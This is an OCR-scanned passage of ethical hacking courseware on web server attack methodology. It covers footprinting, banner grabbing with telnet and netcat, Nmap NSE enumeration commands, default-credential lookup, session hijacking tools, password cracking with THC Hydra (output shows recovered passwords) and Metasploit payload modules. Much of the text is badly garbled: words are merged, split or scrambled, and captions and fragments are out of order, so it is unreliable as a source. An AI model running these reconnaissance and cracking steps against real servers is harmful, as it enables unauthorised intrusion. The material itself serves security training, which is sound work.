scripts
into a targetwebsite.
BufferOverflowAttacks:Thedesign of most web applications
helps themi n sustaining
some amount of data. If that amount exceedsthe storagespaceavailable, the
application
advantage
may crashor exhibitsome other
andfloodsthe application
overflowattack.
vulnerable
behavior.An attackeruses this
with an excess amount of data,causinga buffer
Cross-SiteRequest (CSRF)
Forgery Attack: An attacker exploits
the trust of an
user
authenticated to
CommandInjection
passcode toweb
malicious or commands the
Attacks:In this typeof attack,
server.
a hackeraltersthe content of the
web page byusing HTML code and by identifying the form fields that lack valid
constraints,
SourceCodeDisclosure: Source-code disclosureis a resultof typographical errors i n
scriptsor misconfiguration,
suchas failureto grantexecutablepermissionsto a scriptor
directory. disclosurecan occasionally
Source-code allow attackersto access sensitive
informationaboutdatabasecredentials
andsecret keys to compromise the webserver.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
Concepts
WebServer WebServer
‘Attacks
e °e
Counter:
Patch
sosasarea
Management
WebServer
Security
‘Tools
Ey tstormation
GatheringFootprinting Wen Server
WebsiteMirroring
BAwetnerapitiyscanning
Session
Mijacking
wer Passwords server Hacking
SE
Web ServerAttack Methodology
previoussection describedattacksthat an attackercan perform
‘The to compromisea web
server'ssecurity, This section explains how the attacker proceeds towards performing a
successfulattackon a web server. A web server attacktypically involvespreplanned
activities
calledan attackmethodology that an attackerfollowsto reachthe goalof breaching
the target
‘web
server'ssecurity
ical andCountermensores
Mackin ©by E-Comel
Copyright
hacka webserver i n multiple
Attackers At eachstage,theattackerattemptsto gather
stages.
informationabout loopholes
and to gainunauthorizedaccess to the web server. Thefollowing
oftheattackmethodology
are thevarious stages forwebservers
Information Gathering
Every
attackertries to collectas muchinformationas possible
about the targetweb
Theattackergathers
server. andthenanalyzes
the information it to find lapses
i n the
mechanisms
current security of theweb server.
WebServerFootprinting
Thepurposeof footprinting is to gatherinformationaboutthe security
aspectsof a web
server with the helpof toolsor footprintingtechniques.
Through footprinting,
attackers
can determinethe web server's remote access capabilities, and services, and
its ports
other
aspects
of its security
WebsiteMirroring
Websitemirroringis a methodof copyinga websiteand its content onto anotherserver
for offlinebrowsing. With a mirrored website,an attackercan view the detailed
structure of thewebsite.
Vulnerability
Scanning
Vulnerability finding
scanningi s a methodof thevulnerabilitiesandmisconfigurations
of
web server,
‘a Attackersscan for vulnerabilitieswith the helpof automatedtoolsknown
asvulnerability
scanners.
Hijacking
Session
Attackerscan perform session hijacking
after identifying
the current session of the
client. The attackertakescomplete control over the user session through session
hijacking,
Hacking
WebServerPasswords
Attackersuse password-cracking hybrid
methodssuchas brute-forceattacks, attacks,
anddictionaryattacksto crackthewebserver'spassword,
ical andCountermensores
Mackin ©by E-Comel
Copyright
InformationGathering
1 Informationgathering
collecting
votes
information
aboutthe
‘newsgroups,the
\@-Astackerssearch Internet,
bulletin
for information
boards,
aboutthecompany
Cy
(@Astacers
use tooe
such
as Whois.net
‘Whos
‘he
databases
domain
name,
to getdeal suchas
P address,oF
Information Gathering
Informationgathering is the first andone of the most importantstepstowardhacking a target
server. In thisstep,
‘web an attacker collectsa s muchinformationas possibleaboutthe target.
server byusingvarious toolsand techniques. Theinformationobtainedfromthisstephelps the
attacker i n assessingthesecurity postureof thewebserver. Attackers maysearch the Internet,
newsgroups, bulletin boards,
Attackerscan use toolssuchas Whois.netandWhoisLookup target
andso on for gatheringinformationaboutthe organization,
to extract informationsuchas the
=
WHois
and
domainname, IPaddress,
target’s
autonomous systemnumber.
Source: https://www.whois.net
WHOis.net
is
user perform
designedhelpperform
to
a domainwhoissearch, whois
lookup
a varietyof
whoisIP lookup,
relevantinformationon domainregistration
functions.
It letsthe
andwhoisdatabasesearchfor
availability.
provides
and insight
It into a
domain'shistory andadditionalinformation,Thewhoislookup can be usedanytimeto
whoisaddresslistings
or even search a
determinewho owns a domainname, how many pagesfrom site are listedwith
Google, for a website’s
owner.
ical andCountermensores
Mackin ©by E-Comel
Copyright
WHOIS LOOKUP
WHOis.net
5
°
The
following
additional
are
displaying
Figure
some
online
13.2: Screenshots
tools:
a WHOIs:net search
information-gathering
result
(https://whois.domaintools.com)
‘+
WhoisLookup
=
Whois(https://www.whois.com)
=
DNSstuff
WHOIS/IPWHOIS(https://tools.dnsstuff.com)
Lookup
=
(hetps://centralops.net)
DomainDossier
Find (https://pentest-tools.com)
Subdomains
Note: For complete
coverageof information-gathering
techniques,
refer to Module 02
Footprinting
andReconnaissance.
InformationGathering
fromRobots.txtFile
filethesite
(©Therobotstt contain tof theweb
server directories
‘ner
andfilesthattheweb
wants to hie fromwebcrawlers,
file
Information
Robots
A n attacker
can simply
romthe URL
such
equestthe
and retrieve sensitive
as the root directory
andcontent management
at
structure
information
system
website
aboutt he target
Information Gathering
from Robots.txtFile
‘A
websiteowner creates a robots.txtfile to list the files or directoriesa web crawlershould
searchresults.Poorly
indexfor providing written robots.txtfiles can cause the complete
indexing
of websitefilesand directories.If confidentialfiles anddirectoriesare indexed,
an
attackermayeasily
obtaininformationsuchas passwords, emailaddresses, hiddenlinks,
and
membership
areas.
If the owner of the targetwebsitewrites the robots.txtfile without allowing the indexing of
restricted pagesforproviding an attackercan still view the robots.txtfileofthe
searchresults,
siteto discoverrestrictedfilesandthenview themto gather information,
URL/robots.txt
An attackertypes i n the address
barof a browserto view the targetwebsite's
robots.txtfile,An attackercan alsodownloadthe robots.txtfileof a targetwebsiteusingthe
Weettool.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Fle Est FormatView Help
User-agent: *
htm
en-us/windows/s4/mateix.
en-us/windows/s4/matesx.
html
/*/security/search-results.aspx?
Disallow: /*/music/*/search/
Disallow: /*/search/
Disallow: /*/musie/*/Search/
Disallow: /*/Search/
Disallow: /*/newsearch/
Disallow: *action-catalogsearch&
Allow: /*/store/*/search/
Allow: /*/store/*/layout/
Allow: /*/store/ausi¢/groove-music-pass/*
Allow: *action=catalogsearchécatalog_node-gridtpage-2$
Allow: taction-catalogsearchécatalog_mode-gridtpage-3$
Allow: mode=gridéoagend$
taction=catalogsearchécatalog
Allow: tactlon=catalogsearchécatalog_mode=gridtoage=5$
Allow: *action-catalogsearchécatalog_mode-gridtpage-6$
Allow: *action-catalogsearchécatalog_mode-gridtpage-7$
Allow:
Allow:
Allow:
taction-catalogsearché
mode=gridépag
taction=catalogsearché
mode=gridépag
*actionscatalogsearchécatalog_node=gridtpage=3$
Allow: *action-catalogsearchécatalog_mode-grictpage-4$
Allow: *action-catalogsearchécatalog_mode-gridipage-5$
Allow:
Allow: taction=catalogsearché
mode=gridépag
taction=catalogsearchécatalog_mode=gridtoage=7$
Allow: *action=catalogsearch&catalog_mode=gridtoage-8$
Disallow: *action-accessorysearchéproduct="8"
Allow: *action-accessorysearchiproduct="$
Disallow: *actionsaccessorysearch&
Figure displaying
13.2: Screenshot
a
robots fle
Module3 1635
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
WebServerFootprinting/Banner
Grabbing
Use
tool such
a Netra, itprecon,
a nd
WebServerFootprinting/Banner
Grabbing
Byperforming web server footprinting,
an attackercan gathervaluablesystem-level
datasuch
as account details,OSs,softwareversions, server names, anddatabase schemadetails.The
Telnetutilitycan be usedto footprint a web server and gather informationsuchas server
name, server type,OSs, and runningapplicationsrunning.Furthermore,footprinting
toolssuch
as Netcraft,ID Serve, and httpreconcan be usedto perform web server footprinting.
These
footprintingtools can extract informationfrom the targetserver. Here,we examine the
featuresandtypesof informationthesetoolscan collectfromthe targetserver.
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebServerFootprinting
Tools
Noteat
teste
Press
ewe
ine
Telnet
SearchWeb byDomain
Explore
wobsites extensions.
visitedbyusers ofthe Nateraft
13:23:Secenshotof Netraft
Figure
Netcat
Source:http://netcat.sourceforge.net
Netcat isa networkingutilitythat readsandwrites dataacross networkconnections by
usingthe TCP/IP It isa reliable“back-end―
protocol. tool useddirectly
or drivenbyother
programs Its alsoa networkdebugging
andscripts. andexplorationtool.
The following
are the commandsused to performbanner grabbing for
as an example
www.moviescope.com to gather
informationsuchas server typeand
Module3 1628
Page ical Mackin
and ©
Countermensores
Copyright
by E-Comel
Server identified as
Microsoft-11S/10.0
Figure
23.24:
Neteatoutput
=
Telnet
Source:https://docs.
microsoft.com
networkprotocol
Telneti s a client-server that is widely
usedon the Internetor LANS.It
provides
loginsessions for a user on the Internet. A single
terminalattachedto another
computer thesessionbyusingTelnet.Theprimarysecurity
emulates i ssueswithTelnet
are
©
the following,
datasent through
Itdoes not encrypt the connection.
© It lacks
scheme.
an authentication
to perform
Telnetenablesan attacker attack.It probes
a banner-grabbing HTTPservers
to determinethe server field i n theHTTPresponseheader.
For instance,the following
procedure
is utilizedto enumerate a hostrunningon HTTP
(TCP
80).
© Request
Telnetto connect to a hoston a specific
portwith thecommand# telnet
www.moviescope.com 80 andpressEnter.Ablankscreen appears.
© / HTTP/1.0
TypeGET and
TheHTTPserver responds
press
Enter
twice.
withthe informationshowni n thescreenshot,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Server identified as
Microsoft-11S/10.0
httprecon
Figure
Telnet
13.25: output
Source:https://www.computec.ch
is a tool for advanced
httprecon webserver fingerprinting.
Thistool performs
banner-
grabbing
attacks,
status codeenumeration, and headerordering
analysis
on the target
webserver andprovidesaccurateweb server fingerprinting
information.
httpreconperforms
the followingheaderanalysis test caseson the targetweb server:
A legitimate
GETrequest for an existing
resource
exceedingly
‘An longGET request(a UniformResource Identifier (URI)of >1024
bytes)
‘A
common GETrequest
for a non-existing
resource
‘A for an
common HEADrequest existing
resource
whichis allowed
Enumeration with OPTIONS,
whichis usually
TheHTTPmethodDELETE, not permitted
HTTPmethodTEST,
‘The whichis not defined
protocol
‘The version HTTP/9.8,
whichdoesnot exist
AGET requestincluding patterns(e.g., and96%)
attack
:./
ical andCountermensores
Mackin ©by E-Comel
Copyright
IDServe
Figure
13.26: of itprecon
Sereenshot
Source:https://www.gre.com
ID Serveis a simple
Internet server identificationutility.Thefollowing
is a list of its
capabilities.
© HTTP
Server
Identification:
‘website's
IDServecan identify
server software.ID Serve sends
the make,model,and version of a
thisinformationi n the preamble
to web queries,but theinformationis not visibleto the user.
of replies
ical andCountermensores
Mackin ©by E-Comel
Copyright
ReverseDNSLookup: WhenIDServeusersenter a site’s domainname or
or server's
URL,the application will use a DNS to determinethe IP addressof that domain.
However,it is occasionally usefulto proceed
i n theotherdirection
to determinethe
domainname associated with a knownIP address.Thisprocess,knownas reverse
DNSlookup, is alsobuilt into ID Serve.ID Serveattemptsto determinethe
associated
domainname for any enteredIPaddress.
@Bsn
Seve
ison
IDServer reesisecusrtmeraety ot 203 Gen Reseach
Ca.
| O8A/telp
|
BeckgioundSewerQuery
/one
frown
copy
©conivedhacke.com] ow
niu
inert ser RL Pash ou ca)
@ ] Herre sana
be
specie
tacntonsseone
[__temytieseves a
@ serene
@ Tn seriot
proach
to] aa
Thefollowing
are some
13.2:
additionalfootprinting
of
Figure ScreenshotO Serve
tools:
=
(https://github.com)
Recon-ng
#Uniscan(https://sourceforge.net)
Nmap (hetps://nmap.ora)
(https://github.com)
GhostEye
(https://code.google.com)
Skipfish
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebServerInformationUsing
Enumerating Nmap
WebServerInformation Using
Enumerating Nmap
Source:https://nmap.org
Nmap,along with the NmapScripting Engine (NSE), can extract a large
a mount of valuable
information fromthe targetweb server. In additionto Nmap commands, NSEprovides scripts
‘An
of
that revealvarious types useful informationaboutthe target
attackeruses the following commands
Nmap andNSEscripts
to
server an attacker.
to extract information,
*
Discover
domains
$nmap
hostmap:
virtual with
--script hostmap<host>
a server
that
usesmethod:
Detect vulnerable theTRACE
nmap --scripthttp-trace -p80 localhost
Harvestemailaccountswith http-google-email
$nmap
--script http-google-email<host>
u serswith http-userdir-enum:
Enumerate
nmap p80 --script http-userdir -enum localhost
Detect
HTTP
$nmap
TRACE
~p80 --scripthttp-trace <host>
bya webapplication
Checkifthe webserver is protected firewall(WAF)
or IPS
ical andCountermensores
Mackin ©by E-Comel
Copyright
c ommon webapplications
Enumerate
$nmap
--script http-enum-p80<host>
Obtainrobots.txt
$nmap -p80 --script http-robots.txt <host>
Thefollowing
are some additionalNmap commandsusedto extract webserver information:
nmap -sV-O -p target IP address
nmap ~sV --scripthttp-enum target IP address
nmap target IP address -p 80 --script http-frontpage-login
=
13.28:Screenshotof Nmap
Figure
Module3 1644
Page ical andCountermensores
Mackin
©by E-Comel
Copyright
WebsiteMirroring
of
the
profile
Structure,
links,
et
ste’directory
fle structures, external
footprinting to make
activites more efficent
NCollector
Usetoolssuchas Stu,
WebsiteCopier,
UrTrack WebCopier
WebsiteMirroring
Websitemirroring copies an entire websiteand its content onto a localdrive.Themirrored
websiterevealsthe completeprofile of the site'sdirectory file structure,
structure, external
links,
images,web pages,andso on. Witha mirroredtarget
the website'sdirectories
and gain valuableinformation.
doesnot needto be online to go through
website,
an attackercan easily
An attacker
map
who copiesthe website
the targetwebsite.Furthermore, the attackercan
gainvaluableinformationbysearching the comments andother items i n the HTML source code
of downloadedweb pages.Many
examples
onto a localdrive; includeNCollectorStudio, a
websitemirroringtoolscan be usedto copy targetwebsite
HTTrackWebSite Copier, WebCopier
+
Ripper
Pro,andWebsite
Copier
NCollector Studio
http://www.calluna-software.com
Source:
NCollector
Studiois a websitemirroringtool usedto downloadcontent fromthe web to
alocal computer. Thistool enablesusers to crawlfor specificfile types,makeany
websiteavailablefor offline browsing, or simply download @ website to a local
‘computer.
ical andCountermensores
Mackin ©by E-Comel
Copyright
13:29:
Figure Screenshot
ofNColetorSto
Thefollowing
are some additionalwebsitemirroringtools:
=
HTTrack (https://www.
WebSiteCopier httrack.com)
+
WebCopier
Pro (http://www.
maximumsoft.com)
‘=
Website
RipperCopier(https://www.tensons.com)
(http://visualwebripper.com)
WebRipper
Cyotek
WebCopy (https://www.cyotek.com)
Module3 1646
Page tical MakingandCountermensores
by
Copyright©
Comet
DefaultCredentialsof WebServer
Finding
\@
Manyweb
feces are
root
webserver
adminsratwe
andarinthe
{©en these
interfacespubliely
directory
scminstatve
interfacecredenttsarenot
properly remain setto default
configuredand
atten
identity
(@ Attackers
running
login
thedefault rede:
to the spptiaton
administrative
interacedocomentaton
© Canad the and
database
© Use
Metaspit'bltin oan the sree
=
built-in
database
toscan
UseMetasploit’s
(http://open-sez.me)
Useonlineresourcessuchas OpenSezMe
the server
andcirt.net
(https://cirt.net/passwords) to identify
thedefaultpasswords
‘=
Attempt
and attacks
password-guessing
brute-forcing
defaultcredentialscan grantaccess to the administrativeinterface,
‘These the
compromising
web
server
a
andthe exploit
allowing attackerto the main web application.
Source:https://cirt.net/passwords
Cirt.net is a lookup
databasefor defaultpasswords,
credentials,
and ports.
ical andCountermensores
Mackin ©by E-Comel
Copyright
with
web application
securityscanner
Thefollowing
13.50Sereenshot
Figure
default
for theDS web
the
displaying of crt.net
password page
websites finding defaultpasswords
are some additional of server
administrative
interfaces:
=
http://open-sez.me
=
https://www-fortypoundhead.com
=
http://www.defaultpossword.us
https://default-password.info
Attps://www.routerpasswords.com
ical andCountermensores
Mackin ©by E-Comel
Copyright
DefaultContentof WebServer
Finding CEH
functionalities
inthewebservere
Usetooshe
Wht? (eps/rtnet
Utps//arasecurtyfocus.com)
dul content
teat the
andexploit
‘Sample
functionality
sample
to demonstratecommon tasks
Manyservers contain various andpagesdesigned
scripts to demonstrate
certain
application server functionsand application
programming (APIs).
interfaces Often,web
servers fail to secure these scriptsfrom attackers,
and these sample
scriptseither
contain that can beexploited
vulnerabilities byattackers
or implement
functionalities
that allowattackersto exploit.
Publicly
accessiblepowerfulfunctions
webservers includepowerful
‘Some functionalities
that are intended
for administrative
personnel
and restrictedfrom public
use. However,attackersattemptto exploit
such
powerful
functionsto compromise the server and gain access. For example,
some
application
servers allowwebarchivesto be deployed over the same HTTP
portas that
usedbythe application. An attackermay use common exploitation
frameworkssuchas
to perform
Metasploit scanningto identify defaultpasswords,uploadbackdoors,and
gaincommand-shell access to the target
server.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Serverinstallation
manuals
attackerattemptsto identify
‘An server manuals,whichmaycontain usefulinformation
about configuration and server installation.Accessing this informationallowsthe
attackerto preparean appropriateframeworkto exploittheinstalledweb server.
Tools such as Nikto2 and exploit databases. such as_—SecurityFocus
(https://Awww.securityfocus.com)
can be usedto identifydefaultcontents.
=
Nikto2
Source:https://cirt.net
Nikto is a vulnerability
scanner usedextensively
to identify
potential
vulnerabilitiesi n
webapplications
and
webservers.
ie
i fiedhacker.
J
ERROR:Error Limit (20) reachedfor ho:
Error limit (28) reached for ho
ERROR:
terminated: 19 error(s) and 4 iten(s)
2019-11-1920:51:15
of
13.31Screenshot Nikto2
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
Finding
Directory of WebServer
Listings
(©When
a
web
server
receives
directory,
to of
a requestforthe responds [Index /atiact
Finding
ter
“ryt
orleting
theattackers
recor stings
Directory
Whena web server
=
sometimespossessthefllowing
the
web
to compromise
discovering
the webserver
of WebServer
Listings
receives
exploit
software9990
vulnerable that gvesacces
requestfor
withinthedirectory
ReturnDefaultResource
a
forthe
allow
t o the
directory,
0ss
rather than a file,the web server
ical andCountermensores
Mackin ©by E-Comel
Copyright
Indexof /
Pron
das 1800
ska? 13K
1308
i803
Bucisss1809
201801 30K
ois 10K
Be ovnonsnisat
20180019
dkearyml 1300-268
ease 809
Sis
93K
susan
1908
ak
oie
mates evn
neck 0180019180020
NEN
hon
Though
directory
Figure
listingsdo
13.2: Screenshot
not have significant
relevance
asample
displaying directory
from
listing
a security they
perspective,
occasionally
possess the following vulnerabilities
that allow attackers to compromiseweb
applications:
=
access
Improper controls
access
root
of
Unintentional to theweb
‘=
afterdiscovering
In general, a directory
servers
on a webserver, an attacker makesa requestforthat
directoryand attemptsto access the directory listing.
Attackersalso attemptto exploit
vulnerablewebserver softwarethat grantsa ccessto directorylistings.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Vulnerability
Scanning
Implementverity cto
\weakneses identity
andHf
na network determine the
‘Vulnerability
Scanning
Vulnerability
scanning is performed
web server or network.
to identify
Vulnerability
vulnerabilitiesandmisconfigurations
scanningrevealspossible
exploitin a web server attack. In the vulnerability-scanning
weaknesses
phase,
i n a target
i n a target server to
attackersuse sniffing
techniques to obtaindataon thenetwork trafficto determine activesystems, networkservices,
and applications.Automatedtools suchas AcunetixWebVulnerability Scannera re used to
perform vulnerability
scanningon a targetserver andfind hosts, services,andvulnerabilities.
=
AcunetixWebVulnerability
Scanner
Source:https://www.acunetix.com
AcunetixWebVulnerability Scanner(WVS) scans websitesanddetectsvulnerabilities.
WVSchecks
‘Acunetix webapplications for SQLinjections,XSS,and so on. It includes
advancedpen testingtools to ease manual security audit processes and creates
professionalsecurityaudit and regulatory compliance reportsbasedon AcuSensor
Technology.It supportsthe testingof web formsand password-protected areas, pages
with CAPTCHA, singlesign-on,and two-factorauthenticationmechanisms. It detects
application
languages, web server types,and smartphone-optimized sites. Acunetix
crawlsandanalyzes differenttypesof websites, including
HTMLS, Simple Object Access
Protocol(SOAP), andAsynchronous JavaScript andExtensibleMarkup Language (AJAX)
It supportsthe scanningof network services running on the server and the port
scanning
of
the
web server.
ical andCountermensores
Mackin ©by E-Comel
Copyright
acunetix
13:3; ScreenshotofAcunetix
Figure Web Vulnerability
Seanner
Thefollowing vulnerability
are some additional tools:
scanning
=
Fortify (https://www.microfocus.com)
Webinspect
+
Tenable.io(https://www.tenable.com)
=
Immuniweb(https://www.immuniweb.com)
©
Netsparker
(https://www.netsparker.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Finding Vulnerabilities
Exploitable
(inom ei come
machine
prio
gainghar
Finding Vulnerabilities
Exploitable
i n softwaredesign
Flawsandprogramming errors leadto securityvulnerabilities.Attackerstake
to perform
ofthesevulnerabilities
advantage various attackson the confidentiality,availability,
or integrityof
system.Softwarevulnerabilitiessuchas programmingflaws in a program,
a
kernelcan be exploited
service, or within theOSsoftware
or code.
to execute malicious
Manypublic
vulnerability that are availableonlineallow access to information
repositories
about various softwarevulnerabilities.Attackerssearchon exploit sites suchas SecurityFocus
(https://www.securityfocus.com) and Exploit Database(https://www.exploit-db.com) for
exploitable vulnerabilitiesof a web server basedon its OSandsoftwareapplications, Attackers
use theinformation gathered in the previousstages
to findthe relevant byusing
vulnerabilities
ExploitDatabase.
Exploiting
thesevulnerabilitiesallowsattackersto execute a commandor binary
o n a target
machineto gain higherprivileges than existingones or to bypass securitymechanisms.
Attackersusingtheseexploits
can even access privileged
user accountsandcredentials.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
13.34Screenshot
of Google Database
Hacking (GHB)
ical andCountermensores
Mackin ©by E-Comel
Copyright
SessionHijacking
valiDs
1©Shit
to
gain
‘unauthorized
session
acces othe we
server to snoopdata
session
hijacking
Use
sucha session
Sidejscking,
Crosse
techniques
fhaton,session
et
ta
serpting,
validsession cookies
capture
andide
Usetoolssuch Suite,
as Burp
sMijack,Etereap,
et. to automate
SessionHijacking
Validsession IDscan besniffedto gain unauthorized
access to a web server andsnoop its data
attackercan hijack
‘An or stealvalidsessioncontentusingvarious techniques suchas session
token prediction,session replay,session fixation,sidejacking,
and XSS.By using these
techniques,the attackerattemptsto capture valid session cookiesand IDs i n established
sessions.Theattackerusestoolssuchas Burp Suite,Firesheep,andJHijack
to automate session
hijacking.
=
BurpSuite
Source:https://portswigger.net
BurpSuite is a web security
testingtool that can hijacksession IDsi n established
Sequencer
toolSuite
sessions.The
tests of i n Burp
this tool,a n attackercan predict
therandomnesssessiontokens.
the next possible
With
sessionIDtokenand use that to take
over
valid
session.
a
ical andCountermensores
Mackin ©by E-Comel
Copyright
io
13.35:
Figure Sereenshot
of Bur Suite
Thefollowing
are some additionalsession hijacking
tools:
+
(hetps://sourceforge.net)
IMijack
=
(https://ettercap.github.io)
Ettercap
=
=
(https://github.com)
CookieCatcher
(https://github.com)
CookieCadger
Note:Forcomplete
coverage of concepts
andtechniques
relatedto session hijacking,
referto
11:
Module SessionHijacking,
WebServerPasswordHacking
WebServerPasswordHacking
In this phase
of web server hacking,an attackerattemptsto crackweb server passwords. The
attackermay employ all possible
techniques of password crackingto extract passwords,
including password guessing,dictionary attacks,brute-force attacks,hybridattacks,
precomputed hashes, rule-basedattacks,distributednetworkattacks,
andrainbowattacks.The
attackerneedspatience to crackpasswords becausesome of thesetechniques are tediousand
time-consuming. Theattackercan alsouse automatedtoolssuchas Hashcat, THC Hydra, and
Nerackto crackweb passwords andhashes.
=
Hasheat
Source:https://hashcat.net
Hashcat
is a cracker with multiple
compatible OSsandplatforms
andcan perform multi
hash(MD4, 5; SHA 224,256,384,512;RIPEMD-160;
-
etc.],multi-devicepassword
cracking.
Theattackmodesof thistool are straight,
combination, hybrid
bruteforce, dict
+mask,
andhybrid
+
mask dict.
ical andCountermensores
Mackin ©by E-Comel
Copyright
13.26Screenshot
Figure ofHasheat cracker
password
=
THCHydra
Source:https://github.com
THC Hydra parallelized
is a login
crackerthat can attacknumerous protocols.
Thistool is
proof-of-concept
code that provides researchersand securityconsultantsthe
possibility
todemonstratehow easyit wouldbe to gainunauthorizedremote access to
a system.
Versions
enable;Concurrent
POST;HTTP-GET;
HTTP-HEAD;
HTTPS-GET;
FORM-POST;
System
HTTP-POST;
(CVS);
Firebird;
HTTP-PROXY;
HTTPS-POST;
HTTPS-HEAD;
FTP;
HTTP-FORM-GET;
HTTPS-FORM-GET;HTTPS.
HTTP-Proxy;
ICQ;
Internet Message
HTTP-FORM-
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Access (IMAP);
Protocol Chat(IRC);
Internet Relay LightweightDirectory
AccessProtocol
(LDAP); Memcached; MongoDB; Microsoft SQLServer; MySQL; Network Control
Protocol (NCP);NetworkNewsTransfer Protocol (NNTP); Oracle Oracle
Listener; system
Oracle;
identifier(SID); PC-Anywhere;personal computer NetworkFileSystem(PC-NFS);
POP3; Radmin;
Postgres; RemoteDesktop Protocol (RDP); Rexec; Rsh;
Rlogin; RealTime
Streaming Protocol(RTSP);SAPR/3; SessionInitiation Protocol(SIP);
ServerMessage
Block(SMB); Simple MailTransferProtocol(SMTP); SMTPEnum;Simple Network
Management Protocol(SNMP) vi+v2+v3;SOCKSS; SSH(vi andv2);SSHkey;Subversion;
TeamSpeak (152);Telnet; VMware-Auth; Virtual Network Computing (VNC); and
Extensible MessagingandPresence Protocol(XMPP)
parr
hydra
-L /root/Mordlists/Userr
=
10
fan Hauser/THC
vice organizations, or for illegal purpo:
ra. (https: //github .com/vanhauser-the/the-hydra)
overall 16 tasks, 41174 login tri
19,.10..10.10:
Liftp] host: 10.10.10. 10 word: apple
ATUSY4 tries/min, 4727 tries in 00:01n, 36447 to do in 00
min, 14103 00:03h, 27068 to do i n 00:0
0.10.10.
16. ord:
test
19,10,10.10 word: qwerty
¢
successfullycompleted,
t
8
3 valid passwordsfound
[WARNING]
Writing restore file because final worker threads did not complet
until end
or could
not be
connected
complete
finished at
con/vanhauser-thc/the-hydra)
‘github.
Thefollowing
Figure Screenshot
13,7: password
of THC
Hydra
cracking
are some additionalpassword tools:
cracker
=
Nerack(https://nmap.ora)
+
(http://project-rainbowerack.com)
Rainbowcrack
+
(htep://www.edge-security.com)
Whuzz
Wireshark(https://www.wireshark.org)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Using Serveras a Proxy
Application
‘We
serves
ad
reverse
HTTP
pros
enabled
emoloyes
atackesto
perform
wthforwarding functions re by the
Ah
Using Serveras a Proxy
Application
Webservers are occasionally
configured
to perform
functionssuchas forwarding
or reverse
enabledare employed
HTTP proxy.Webservers withthesefunctions byattackers
to perform
the following
attacks:
=
Attacking
third-party
systemson the Internet
onya cv
ae
—_——_—_|=
| 6 [J}«_____—__
13.38:
Figure
ofthe
lastration
use
of asa applicationserver prony
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
e e e
Concepts
WebServer WebServer WebServer
‘Attacks tack
Patch
Management
WebServer
Security
‘Tools
ical andCountermensores
Mackin ©by E-Comel
Copyright
Metasploit
(© T h eMetasplot
webservers, by abusing
known
platform
Frameworkisanexploitdevelopment thatsupports
vulneabltesandleveraging of
fly automatedexploitation
weak passwords
W a Tenet,SH, HTT, andSNM
Metasploit
Architecture
Metasploit
Source:https://www.metasploit.com
Metasploit
‘The toolkit,exploit
Frameworkis a penetration-testing development platform,
and
researchtool that includeshundredsof working remote exploitsfor various platforms.
It
performs of web servers byabusing
fullyautomatedexploitation knownvulnerabilitiesand
leveragingweakpasswords via Telnet,
SSH,HTTP,andSNM.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Dmretasploit
13.39:Screenshotof Metasploit
Figure
may
Anattacker
the
following performwebattack:
use features
of Metasploit
to a server
=
Closed-loop
vulnerability
validation
+
Phishing
Social
simulations
engineering
=
=
brute
Manual forcing
Manual
exploitation
=
Evade-leading
Metasploit
defensivesolutions
enablespen testersto perform
the following:
=
Quickly
complete
pen-test byautomating
assignments tasksand leveraging
repetitive
multi-levelattacks
‘Assess of web applications,
the security networkandendpoint as well as email
systems,
users
Tunnelanytrafficthroughcompromisedtargetsto pivotdeepinto a network
Customizethe content andtemplate
of executive,audit,andtechnicalreports
ical andCountermensores
Mackin ©by E-Comel
Copyright
Metasploit
Architecture
The Metasploit Frameworkis an open-source exploitation frameworkthat provides security
researchers and pen testers with a uniformmodelfor the rapiddevelopment of exploits,
payloads, encoders, (NOP)
no operation generators, and reconnaissancetools.Theframework
reuses large chunksof codethat a user wouldotherwisehave to copyor re-implement on a
per-exploit basis.Theframeworkis modularin architectureandencourages the reuse of code
across various projects. Theframeworkcan be brokendown into a few different pieces, the
lowestlevel of whichis the frameworkcore, The frameworkcore is responsible for
implementing all the required
interfacesthat allowinteraction with exploit
modules, sessions,
andplugins. It supports research,
vulnerability exploitdevelopment, andthecreation of custom
security
tools.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Metasploit Module
Exploit CEH
Made,
Sok withthe ae mn to
‘Metasploit
usingthe
Steps exploit system
Framework
lp of whic
‘wthhe
Dlatorms users
wth sige explo
ean targetmany
] on
Active
Contre Blt
aso
perform
bre and attempt
attacks,
force
Metasploit
Payload
and Auxiliary
Modules
Module3 1667
Page ical andCountermensores
Mackin
©
by E-Comel
Copyright
NOPSModule
Metasploit
to
‘Command
generate
aNOP
sled
ofa
given
lengthto NOP ‘Command
generate a50-bylesled
as ence
Modules
Metasploit
‘MetasploitExploitModule
It is a basicmodulei n Metasploit a single
usedto encapsulate exploit,
usingwhichusers
targetmanyplatforms. Thismodulehassimplifiedmeta-informationfields.Usingthe
Mixins feature, users can alsodynamicallymodify
exploit
behavior,
perform brute-force
attacks, andattemptpassive exploits,
A system can beexploitedwith the Metasploit
Framework through
the followingsteps:
©
Configure
Verify
an active
the exploit
exploit
options
Selecta target
Selecta payload
Launchthe exploit
‘Metasploit
Payload Module
exploit
‘An carries a payload
i n its backpackwhenit breaksinto a system
andthenleaves
the backpackthere.Thefollowing threetypesof payload modulesare provided
bythe
Metasploit
Framework,
gles: andcompletely
Self-contained standalone
©
©.
Stagers:
Setsup
Stages:
anetwork
connection
the
between attacker andvictim
bystagermodules
Downloaded
ical andCountermensores
Mackin ©by E-Comel
Copyright
Metasploit
‘A payloadmodulecan upload and downloadfilesfromthe system, take
screenshots,
andcollectpasswordhashes. It can even take over the screen, mouse, and
keyboardto controla computerremotely. The payload Module establishes a
communication channel between the Metasploit frameworkand victim host. It
combines codethat is executedas the resultof an exploit
arbitrary succeeding, To
generatepayloads,a payload is first selectedusing the commandshown i n the
screenshot
Figure13.41:Sereenshot
displaying
t he Metasploit command
payload
‘MetasploitModule
Auxiliary
modules
